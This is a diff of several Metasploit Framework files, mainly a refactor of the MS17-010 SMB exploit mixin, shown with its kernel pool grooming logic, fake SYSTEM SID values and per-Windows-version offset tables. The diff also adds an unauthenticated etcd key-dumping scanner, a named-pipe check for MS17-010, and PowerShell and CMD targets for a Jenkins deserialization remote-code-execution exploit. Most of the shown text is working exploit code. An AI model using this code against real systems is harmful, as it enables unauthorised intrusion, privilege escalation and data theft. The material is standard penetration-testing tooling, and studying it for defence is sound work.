elsif os.starts_with? 'Windows 7 ' or os.starts_with? 'Windows Server 2008 R2'
@ -331,26 +330,17 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
end
end
def find_accessible_named_pipe()
pipes = if datastore['NAMEDPIPE'] != '' then [datastore['NAMEDPIPE']] else @@target_pipes end
def find_accessible_named_pipe
@ctx['pipe_name'], pipe_handle = check_named_pipes(
check_first: datastore['NAMEDPIPE'],
return_first: true
)
pipes.each do |pipe|
begin
pipe_name = "#{pipe}"
pipe_handle = self.simple.create_pipe(pipe_name, 'o')
# if we make it this far, it succeeded
vprint_status("Connected to named pipe: #{pipe}")
@ctx['pipe_name'] = pipe_name
return pipe_handle
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("Inaccessible named pipe: #{pipe} - #{e.message}")
end
if @ctx['pipe_name'] && pipe_handle
pipe_handle
else
raise MS17_010_Error, 'Unable to find accessible named pipe!'
end
raise MS17_010_Error, "Unable to find accessible named pipe!"
end
# todo: spice it up with EternalSynergy output
@ -368,7 +358,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
# groom: srv buffer header
@ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])
# groom paramters and data is alignment by 8 because it is NT_TRANS
@ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)
@ -376,7 +365,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']
@ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])
if datastore['DBGTRACE']
print_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
print_status("BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}")
@ -391,7 +379,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
for i in 0..datastore['LEAKATTEMPTS']
reset_extra_multiplex_id()
vprint_status("Attempting leak ##{i.to_s}")
leakInfo = align_transaction_and_leak(pipe_handle)
@ -416,7 +403,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
pipe_handle = self.simple.create_pipe(@ctx['pipe_name'], 'o')
end
@ctx['fid'] = pipe_handle.file_id
@ctx['pipe_handle'] = pipe_handle
@ctx = @ctx.merge(leakInfo)
@ -699,7 +685,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
end
if not success
print_status("<---------------- | Leaving Danger Zone | ---------------->")
raise MS17_010_Error, "Unable to control groom transaction"
@ -823,7 +808,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
@ctx['trans2_addr'] = trans2_addr
end
def create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr)
xSID_SYSTEM = "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00" # pack('<BB5xB'+'I', 1, 1, 5, 18)
xSID_ADMINISTRATORS = "\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00" #pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
@ -1182,254 +1166,222 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
return (size + align_size - 1) & ~(align_size - 1)
end
WIN7_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), #pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x28,
}
# we will iter these if one is not specified
@@target_pipes = [
'netlogon',
'lsarpc',
'samr',
'browser',
'atsvc',
'DAV RPC SERVICE',
'epmapper',
'eventlog',
'InitShutdown',
'keysvc',
'lsass',
'LSM_API_service',
'ntsvcs',
'plugplay',
'protected_storage',
'router',
'SapiServerPipeS-1-5-5-0-70123',
'scerpc',
'srvsvc',
'tapsrv',
'trkwks',
'W32TIME_ALT',
'wkssvc',
'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
'db2remotecmd'
]
WIN7_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), #pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x1c,
}
WIN7_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), #pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x28,
}
# win8+ info
WIN8_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), #pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x38,
}
WIN7_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), #pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x1c,
}
WIN8_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), # pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x24,
}
# win8+ info
WIN8_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), #pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x38,
}
# win 2003 (xp 64 bit is win 2003)
WIN2K3_64_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
WIN8_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), # pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x24,
}
WIN2K3_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
# win 2003 (xp 64 bit is win 2003)
WIN2K3_64_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
# win xp
WINXP_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
WIN2K3_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
WIN2K_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
# win xp
WINXP_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
# for windows 2008+
WIN7_32_TRANS_INFO = {
'TRANS_SIZE' => 0xa0, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
WIN2K_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
WIN7_64_TRANS_INFO = {
'TRANS_SIZE' => 0xf8, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
# for windows 2008+
WIN7_32_TRANS_INFO = {
'TRANS_SIZE' => 0xa0, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
WIN5_32_TRANS_INFO = {
'TRANS_SIZE' => 0x98, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
WIN7_64_TRANS_INFO = {
'TRANS_SIZE' => 0xf8, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
WIN5_64_TRANS_INFO = {
'TRANS_SIZE' => 0xe0, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
WIN5_32_TRANS_INFO = {
'TRANS_SIZE' => 0x98, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
X86_INFO = {
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
WIN5_64_TRANS_INFO = {
'TRANS_SIZE' => 0xe0, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
X64_INFO = {
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
X86_INFO = {
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
X64_INFO = {
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
OS_ARCH_INFO = {
# for Windows Vista, 2008, 7 and 2008 R2
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
OS_ARCH_INFO = {
# for Windows Vista, 2008, 7 and 2008 R2
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
# for Windows 8 and later
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
# for Windows 8 and later
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
}
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
}
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
GROOM_TRANS_SIZE = 0x5010 # includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
TRANS_NAME_LEN = 4
GROOM_TRANS_SIZE = 0x5010 # includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
TRANS_NAME_LEN = 4
X64_FRAG_TAG_OFFSET = 0x14
X64_POOL_ALIGN = 0x10
X64_FRAG_TAG_OFFSET = 0x14
X64_POOL_ALIGN = 0x10
X86_FRAG_TAG_OFFSET = 0x0c
X86_POOL_ALIGN = 0x08
X86_FRAG_TAG_OFFSET = 0x0c
X86_POOL_ALIGN = 0x08
end
end

9
lib/msf/core/opt.rb
View File

@ -50,18 +50,11 @@ module Msf
Msf::OptPort.new(__method__.to_s, [ required, desc, default ])
end
def self.ssl_supported_options
@m ||= ['Auto', 'TLS'] + OpenSSL::SSL::SSLContext::METHODS \
.select{|m| !m.to_s.include?('client') && !m.to_s.include?('server')} \
.select{|m| OpenSSL::SSL::SSLContext.new(m) && true rescue false} \
.map{|m| m.to_s.sub(/v/, '').sub('_', '.')}
end
# @return [OptEnum]
def self.SSLVersion
Msf::OptEnum.new('SSLVersion',
'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)',
enums: self.ssl_supported_options
enums: Rex::Socket::SslTcp.supported_ssl_methods
)
end

46
lib/msf/ui/console/command_dispatcher/modules.rb
View File

@ -38,6 +38,7 @@ module Msf
"search" => "Searches module names and descriptions",
"show" => "Displays modules of a given type, or all modules",
"use" => "Selects a module by name",
"reload_lib" => "Load a library file from specified path",
}
end
@ -64,6 +65,44 @@ module Msf
framework.datastore['LocalEditor'] || Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR')
end
def reload_file(path, err_msg = 'Only library files can be loaded.')
if path.end_with?('.rb')
print_status("Reloading #{path}")
load path
else
print_error(err_msg)
end
end
def cmd_reload_lib_help
print_line 'Usage: reload_lib [lib/to/load.rb]'
print_line
print_line 'Load a library from specified path'
end
#
# Load a library file from given path
#
def cmd_reload_lib(*args)
if args.length > 0
path = args[0]
end
if args.include?('-h') || args.include?('--help')
cmd_reload_lib_help
return
end
if path.nil?
print_error('Nothing to load.')
return
end
reload_file(path)
end
def cmd_reload_lib_tabs(str, words)
tab_complete_filenames(str, words)
end
def cmd_edit_help
print_line "Usage: edit [file/to/edit.rb]"
print_line
@ -104,12 +143,7 @@ module Msf
return if editing_module
# XXX: This will try to reload *any* .rb and break on modules
if path.end_with?('.rb')
print_status("Reloading #{path}")
load path
else
print_error('Only library files can be reloaded after editing.')
end
reload_file(path)
end
#

75
modules/auxiliary/scanner/etcd/open_key_scanner.rb Normal file
View File

@ -0,0 +1,75 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Etcd Keys API Information Gathering',
'Description' => %q(
This module queries the etcd API to recursively retrieve all of the stored
key value pairs. Etcd by default does not utilize authentication.
),
'References' => [
['URL', 'https://elweb.co/the-security-footgun-in-etcd']
],
'Author' => [
'Giovanni Collazo <hello@gcollazo.com>', # discovery
'h00die' # msf module
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(2379),
OptString.new('TARGETURI', [true, 'URI of the vulnerable service', '/'])
]
)
end
def run_host(_target_host)
path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')
vprint_status("#{peer} - Collecting data through #{path}...")
res = send_request_raw(
'uri' => path,
'method' => 'GET'
)
# parse the json if we got a good request back
if res && res.code == 200
begin
response = res.get_json_document
store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')
# since we know its vulnerable, go ahead and pull the version information
res = send_request_raw(
'uri' => normalize_uri(target_uri.to_s, 'version'),
'method' => 'GET'
)
banner = ''
if res && res.code == 200
banner = res.body
end
report_service(
host: rhost,
port: rport,
name: 'etcd',
proto: 'tcp',
info: banner
)
rescue JSON::ParserError => e
print_error("Failed to read JSON: #{e.class} - #{e.message}}")
return
end
print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")
end
end
end

43
modules/auxiliary/scanner/smb/pipe_auditor.rb
View File

@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -24,34 +25,6 @@ class MetasploitModule < Msf::Auxiliary
deregister_options('RPORT')
end
@@target_pipes = [
'netlogon',
'lsarpc',
'samr',
'browser',
'atsvc',
'DAV RPC SERVICE',
'epmapper',
'eventlog',
'InitShutdown',
'keysvc',
'lsass',
'LSM_API_service',
'ntsvcs',
'plugplay',
'protected_storage',
'router',
'SapiServerPipeS-1-5-5-0-70123',
'scerpc',
'srvsvc',
'tapsrv',
'trkwks',
'W32TIME_ALT',
'wkssvc',
'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
'db2remotecmd'
]
# Fingerprint a single host
def run_host(ip)
@ -65,14 +38,8 @@ class MetasploitModule < Msf::Auxiliary
begin
connect()
smb_login()
@@target_pipes.each do |pipe|
begin
fid = smb_create("\\#{pipe}")
#print_status("Opened pipe \\#{pipe}")
pass.push(pipe)
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
#print_error("Could not open \\#{pipe}: Error 0x%.8x" % e.error_code)
end
check_named_pipes.each do |pipe_name, _|
pass.push(pipe_name)
end
disconnect()
@ -85,14 +52,14 @@ class MetasploitModule < Msf::Auxiliary
end
if(pass.length > 0)
print_status("Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}")
print_good("Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}")
# Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb',
:port => rport,
:type => 'Pipes Founded',
:type => 'Pipes Found',
:data => "Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}"
)
end

23
modules/auxiliary/scanner/smb/smb_ms17_010.rb
View File

@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
@ -51,8 +52,9 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptBool.new('CHECK_DOPU', [true, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),
OptBool.new('CHECK_ARCH', [true, 'Check for architecture on vulnerable hosts', true])
OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),
OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),
OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])
])
end
@ -113,6 +115,23 @@ class MetasploitModule < Msf::Auxiliary
)
end
end
if datastore['CHECK_PIPE']
pipe_name, _ = check_named_pipes(return_first: true)
return unless pipe_name
print_good("Named pipe found: #{pipe_name}")
report_note(
host: ip,
port: rport,
proto: 'tcp',
sname: 'smb',
type: 'MS17-010 Named Pipe',
data: pipe_name
)
end
elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE"
# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)
print_error("Host does NOT appear vulnerable.")

2
modules/auxiliary/scanner/ssh/detect_kippo.rb
View File

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
},
'Author' => 'Andrew Morris <andrew[at]morris.guru>',
'References' => [
['URL', 'https://cultofthedyingsun.wordpress.com/2014/09/12/death-by-magick-number-fingerprinting-kippo-2014/'],
['URL', 'https://www.obscurechannel.com/x42/magicknumber.html'],
['URL', 'http://morris.guru/detecting-kippo-ssh-honeypots/']
],
'License' => MSF_LICENSE

2
modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
View File

@ -695,7 +695,7 @@ class MetasploitModule < Msf::Auxiliary
end
len = hdr.unpack('Cnn')[2]
data = get_data(len)
data = get_data(len) unless len.nil?
unless data
vprint_error("No SSL record contents received after #{response_timeout} seconds...")

43
modules/exploits/multi/http/jenkins_xstream_deserialize.rb
View File

@ -43,6 +43,20 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'python',
'Arch' => ARCH_PYTHON
],
['PowerShell (In-Memory)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
],
['Windows (CMD)',
'Platform' => 'win',
'Arch' => [ARCH_CMD],
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'adduser, generic'
}
}
],
['Linux (Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64]
@ -57,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
